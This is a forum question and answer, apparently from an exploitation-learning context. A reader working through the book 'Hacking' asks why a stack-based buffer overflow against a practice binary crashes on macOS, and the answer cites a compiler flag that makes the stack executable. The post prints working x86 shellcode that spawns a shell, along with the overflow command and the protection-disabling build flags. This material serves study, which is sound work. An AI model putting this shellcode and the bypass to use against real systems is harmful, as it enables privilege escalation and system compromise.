I'm currently working through "Hacking"; I inject the shellcode as an environment variable. In LLDB I can see that I'm overwriting the return address and that EIP is set to the middle of the NOP sled. However, it then throws EXC_BAD_ACCESS and segfaults.
Here is the part of the stack holding my shellcode:
0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"
Invoking lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40') to trigger the buffer overflow, this is what we get when it segfaults:
Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
frame #0: 0xbffffc5e
-> 0xbffffc5e: nop
0xbffffc5f: nop
0xbffffc60: nop
0xbffffc61: nop
I am using gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer to compile the code, and I use the change_mach_o_flags.py script with the --no-pie and --executable-heap options set.
I think the problem is that OSX automatically sets the stack as non-executable. Unfortunately, GCC on OSX doesn't seem to have a -z execstack option. There is no execstack utility either.
I've searched the web and can't find any way to make the stack executable in my compiled code. Is there a way to do this, and if so, how?
From the Apple developer documentation:
There are two ways to make the stack and heap executable:
Pass the -allow_stack_execute flag to the compiler. This makes the stack (not the heap) executable.
Use the mprotect system call to mark specific memory pages as executable. The details are beyond the scope of this document. For more information, see the manual page for mprotect.
See more: https://developer.apple.com/library/content/documentation/security/conceptual/securecodingguide/articles/bufferoverflows.html